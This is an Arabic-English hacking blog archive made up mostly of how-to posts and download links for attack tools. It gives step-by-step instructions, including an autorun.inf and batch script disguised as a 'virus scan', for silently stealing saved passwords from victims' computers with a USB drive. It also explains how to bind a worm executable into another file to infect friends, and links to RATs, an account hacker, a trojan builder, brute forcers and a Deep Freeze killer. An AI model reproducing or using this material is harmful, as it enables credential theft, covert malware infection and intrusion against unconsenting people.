اعلان

Website

المدونة

ملاحظات يجب قراءتها:

1. نتبرئ من استخدام أي موضوع في المدونة في طريق الحرام أو ضد المسلمين.
2. إن لم تجد الموضوع الذي بحثت عنه في محرك البحث، استخدم البحث الداخلي في المدونة.
3. هناك مراكز رفع ملفات تحتاج الى استعمال بروكسي للتحميل المجاني دون عمل حساب مدفوع مثل مركز رفع uploading.com
4. نعتذر عن عدم توفر بدائل لبعض الروابط المفقودة
5. الرجاء فحص الملفات جيداً قبل التشغيل فيما يخص أدوات الهاكرز و الفيديو..الخ
6. ليست كل البرامج كاملة و ليست كل البرامج تحتاج الى تسجيل!!؟؟
7. عزيزي الزائر تشرفنا بزيارتك، و أعلم أنك لست أول زائر و لن تكون الاخير بإذن الله تعالى، تمتع بتصفح المدونة دون مشاكل بإذن الله...
8. لا تنس استخدام (رسائل اقدم) لرؤية باقي مواضيع التصنيفات

انشاء المدونة

تم انشاء المدونة في:

07\01\2009

Black ice

كل عام و أنتم بألف خير بمناسبة مرور 4 سنوات على انشاء المدونة و الحمدلله

ĬŖŞĤ@ĮĐ مدونة الخدع و الشروحات إرشيد الجرايدة ĬŖŞĤ@ĮĐ

‏إظهار الرسائل ذات التسميات Hackers Tools. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات Hackers Tools. إظهار كافة الرسائل

USB Thief as password hacking software

USB Thief- Password Hacking software:

USB Thief is a type of portable stealer software used to hack all locally stored passwords on victim computer. A password is locally stored if the victim hits “Remember Me” while logging in to his account. USB Thief steals following information:

- Visited Links List
- Internet Explorer Cache List
- Internet Explorer Passwords List
- Instant Messengers Accounts List
- Installed Windows Updates List
- Mozilla Cache List
- Cookies List
- Mozilla History List
- Instant Messengers Accounts List
- Search Queries List
- Adapters Report
- Network Passwords List
- TCP/UDP Ports List
- Product Key List
- Protected Storage Passwords List
- PST Passwords List
- Startup Programs List
- Video Cache List

How to use USB Thief as password hacking software:

1. Free Download USB Thief to hack victim passwords.
Password: techotoys.blogspot.com كلمة السر لفك الضغط

2. Unzip the file. Connect USB drive to your computer. Format it.

3. In downloaded file, go to: “USB Thief Modified” folder -> “Copy” folder and copy all the files in “Copy” folder. Paste all the files in USB drive.

Note: Don’t copy the folder, copy files in the folder (I hope you’ve got the point).

4. Now, in USB drive, hit on “hideh.bat” file which makes all the files in USB drive hidden. Delete “hideh.bat” file.

Free USB Thief

5. Move on to victim computer and plug in the USB. Open the USB drive on victim computer and wait for 8-10 seconds. Safely remove the USB from victim computer. All the victim passwords are thus, now captured in our USB drive.

6. Now, to see these passwords, copy “showh.bat” file from the downloaded files. Paste this file in your USB drive and run it in USB. Now refresh. You will be able to see all the hidden files.

USB Thief password hacking software

7. Open “IMNeoWorld” folder which will contain all hacked passwords and license keys.

Free password hacking software

Note: I have tried this USB Thief, but sometimes, it does not appear to steal any passwords. This USB Thief is stealing all other data. If you want to try out this USB Thief on your computer, please use Deep Freeze 6 software to prevent any possible harm to your computer.

Try out this USB Thief to hack victim stored passwords. This password hacking software is really useful if you have physical access to victim computer. If you have any problem in using this USB Thief as password hacking software, please mention it in comments.

Enjoy USB Thief as password hacking software…

اختراق الصور في جهاز كمبيوتر لتصبح كلها نفس الصورة Image Worm: Hack Images on friend’s computer

1. Download Image Worm software to hack images on friend’s computer.
Password: techotoys.net كلمة سر فك الضغط

2. Run the Image Worm software to see:

Hack image Worm

3. Now, select any image on your computer. This image will be used to replace all the images on victim computer i.e. all the images on your friend’s computer will be changed to your selected image.

4. After selecting the image, hit on “Build Worm” and Image worm will create a server.exe file in current directory.

Note: Do not run this server.exe file on your own computer. I don’t know how to nullify the changes done by this image hack. If you want to try out on your computer, make sure you use Deep Freeze 6 software before running server.exe file.

5. Now, bind the server.exe file with any other .exe file using FUD binder software. Send this binded file to your friend and ask him to run it on his computer. After running, our server.exe file will silently install itself on victim computer and all his images will be changed to your image selected in Step 3.

6.a. Images before Image hack:

Hack image worm 1

6.b Images after Image hack:

Hack image worm 2

Thus, now you can see this image hacking software changes all images on victim computer. You are able to hack images on your friend’s computer thanks to Image Worm software.

Note: The server.exe file may take some time to hack images on remote computer. Also, on some computers, Image Worm is able to hack images present in “Pictures” folder. So, the working of Image worm to hack images varies according to computer.

So friends, I hope now you can hack images on your friend’s computer. I have tried this image hack and is working perfectly for me. I had received great response after I had posted this software to hack image on Techotips. Hoping for same response over here. If you have any problem in this tutorial to hack images on remote computer, please mention it in comments.

Enjoy Image Worm software to hack images on your friend’s computer…

How to Hack Passwords Using USB Pen Drive


Today I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you'll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Top 20 Linux Hacking and Security Softwares


1. Nmap ("Network Mapper")


Nmap is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.


2. John the Ripper


John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


3. Nessus


Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006security tools survey from SecTools.Org.


4. Aircrack - The fastest available WEP/WPA cracking tool


Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).


5. Nikto


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).


6. Snort - Everyone's favorite open source IDS


This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.


7. WireShark


Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).


8. Chkrootkit


Chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.


9. Kismet


Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating.


10. Hping


Hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the NmapSecurity Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).


11. Metasploit Framework


Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.


12. Netcat


Netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by insecure.org on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.


13. THC Hydra


When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.


14. Tcpdump


Tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.


15. Ettercap


In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.


16. OpenSSH


OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.


17. Tripwire


Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.


18. Dsniff


Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.


19. RainbowCrack


RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.


20. Rkhunter


Rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special testsfor Linux and FreeBSD.

Web Scanner for Hackers Worth 3195$ for Free

Web Scanner for Hackers Worth 3195$ for Free

http://www.mediafire.com/?je528n6zahdw0zs

Download Hotmail Hacker

Download Hotmail Hacker

http://www.mediafire.com/?zrzddwmy4yi

Fake PayPal Money Adder

Fake PayPal Money Adder



http://www.mediafire.com/?gunejc4vds9rwin

برنامج صنع تروجان غير مكتشف من مضاد الفيروسات PC Guard for Win32

برنامج صنع تروجان غير مكتشف من مضاد الفيروسات PC Guard for Win32


http://www.mediafire.com/?dgt9y9d12dn0jom

لاضافة الاصدقاء على فيس بوك facebook blaster

Here your download link for the demo,please choose which one of list demo you interested:-


1)FaceBook Blaster Pro

http://www.facebookblasters.com/Trail/Facebook.rar

2)Twitter Blaster Pro

http://www.facebookblasters.com/Trail/Twitter.rar

3)YouTube Friend Bomber

http://www.facebookblasters.com/Trail/Youtube.rar

4)MySpace Friend Bomber

http://www.facebookblasters.com/Trail/Myspace.rar

5)Tagged Blaster Pro

http://www.facebookblasters.com/Trail/Tagged.rar

6)Friendster Friend Bomber

http://www.facebookblasters.com/Trail/Friendster.rar


Thank You
Facebook Blaster Pro

Technical Crew

support@facebookblasters.com


Download FaceBook Blaster Pro Trial Version and enter this serial number to activate the full version:

12F45F7890F23456F




برنامج exescriptpro.exe لكتابة الفيروسات و تحويل امتدادها

BeRightBack برنامج المعجزة اكتب فيرسك باللغة السهلة و سجله بمتداد .exe وغير ايقونته مع تحويل برامج ال bat & vbs & cmd الى .exe وجعل له ايقونة

بسم الله الرحمان الرحيم


اخواني السلام عليكم جميعا 


اخواني معظمنا يتقن كتابتة بعض الفيروسات الصغيرة بال البلوك نوت ويحفظها بمتداد bvs 

او bat او cmd و تكون بدون ايقونة ومشكوك فيها 100% و امتدادها مخيف جدا 

ولا يمكن دمجها مع بعض البرامج لان امتدادها غير مسجل في برنامج الدمج

وانا الان جئت لكم ببرنامج يسهل عليكم كل شيء 

يمكنك ان تكتب فيه باي من هاته اللغات vbs & cmd & bat & sj & wsf & ps1

ويحولها الا امتداد .exe مع تغيير الايقونة التي تودها

صورة البرنامج



الان التحميل




وهذا الموقع الرسمي للبرنامج

الأردن أولا و الفيصلي الزعيم
http://www.scriptcode.com/











رابط تحميل برنامج SoftIce لكسر حماية البرمجيـات

 رابط تحميل برنامج SoftIce لكسر حماية البرمجيـات ...

برنامج اختراق الأجهزة نت بص Net Bus


Net Bus 1.6

برنامج من أوائل البرامج التى ظهرت فى إختراق الأجهزة وهو برنامج قوي ومشهور جدا



رابط التحميل


Net Bus 1.7


إصدارة أحدث من السابقة تمتاز بخيارات إضافية 



رابط التحميل


Net Bus 2.0 professional Beta

نسخة إحترافية من الرنامج السابق وهى من النسخ النادرة وتحتوي الى خصائص وخيارات مهمة وكثيرة

رابط التحميل



Net Bus 2.1 professional

إصدارة إحترافية أحدث من السابقة




رابط التحميل


Munga Bunga's HTTP Brute Forcer



Munga Bunga's HTTP Brute Forcer 




طريقة عمل البرنامج تسمى بالقوة الغاشمة 
Brute Force Attack
إذ يحاول اللإتصال ومحاولة 
كشف كلمة سر المسن MSN عن طريق قاموس
باسوردات مسجل عنده



تحميل برنامج شادو لفحص ثغرات المواقع Shadow Security Scanner

شرح برنامج شادو سكان للكشف عن ثغرات المواقع 
السلام عليكم ورحمة الله وبركاته
==-×-==-×-=={×--TaRs--×}==-×-==-×-==
برنامج شادو سكان سيكيورتى 
برنامج مشهور في كشف ثغرات المواقع 
وهو بالاصح مجموعه من اربع برامج 


تكون الثغرات الخطيرة باللون الاحمر والمتوسطه باللون البرتقالي والاقل خطورة باللون الاصفر 
كما تجد بالاسفل شرح للثغرة ومدى خطورتها 

والان كل ما عليك هو استغلال هذه الثغرات 
البرنامج موجود بالموقع الروسى safety lab



Network Security Scanner & Database Security Scanner 

أكتب بياناتك مع ايميل صحيح، لحتى يبعثولك رابط التحميل المباشر

 

برنامج Aero RAT !


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته 




DOWNLOAD LINK : http://aero-rat.com/dl/Aero_2_Beta.rar

xed webcam crash bug (Server)
Changes since last version:
increased connection limit (Client)
set correct version info (Client/Server)
file manager remembers last directory (Client)
speeded up transfers (Client/Server)
added melt server option (Client)
fixed error in file manager (Client)
fixed bug server would inject when no injection selected (Server)
added server side ping check (Server)
fixed progress bar webcam capture (Client)
fixed webcam/screen capture save bugs (Client)
Removed own dns from server builder (Client)
improved server code (Server)
added cls command to command prompt (Client)
added save option to command prompt (Client)
fixed thumbnail view bug (Client)
fixed bug in active ports (Client)
added audio folder to user folders (Client)


Coder : GARETH

unsecure 1.2.zip

برنامج مخصص للهجوم على المواقع التي تتطلب اسم برنامج مستخدم وكلمه سريهPOP3,FTP,HTTP



رابط التحميل:


فحص تشفير البرمجيات التطبيقية ExEINFO PE

ExEINFO PE

برنامج لفحص البرامج التطبيقية اذا كانت مشفرة أم لا و يفيد في الهندسة العكسية

اللي من خلالها تعمل ترويض لبرامج الكمبيوتر و تتحكم فيها...


صورة للبرنامج:


exeinfope.gif

هاي صورة الاصدار القديم مش مشكلة لان رابط التحميل مباشر و لآخر اصدار



برنامج مجاني لمسح كامل الموقع لايجاد ثغرات XSS

برنامج هو Acunetix Web Security Scanner وهو يقوم بعمل مسح للموقع واكتشاف الثغرات الموجودة به سواء نتيجة اخطاء برمجية او مشكلات اخرى متعلقة بالسيرفر الخ



يمكنك مشاهدة فيديو تعليمي للبرنامج من هنا

النسخة المجانية من البرنامج يمكنها الكشف عن ثغرات XSS فقط ويمكن تحميلها من هنا

صفحة تحميل برنامج القاضي على الديب فريز Fuck deep Freeze

Fuck deep Freeze

يقضي على برنامج الديب فريز مجمد النظام، حيث أن التغييرات التي تحدث قبل اعادة تشغيل الجهاز في الجهاز يتم استرجاع كل شيء الى نقطة آخر مرة تم فيها تفعيل برنامج الديب فريز

اذن برنامج الديب فريز هو عقبة أمام هاكرز الأجهزة لذلك هذا البرنامج Fuck deep Freeze يساعد هاكرز الأجهزة بسهولة اختراق الأجهزة للضحايا و التمكن منها



صفحة التحميل هنا:


أو



و هاي صورة لأصدار سابق من البرنامج
[Image: 26vh.gif]
الى اللقاء يا أصحابي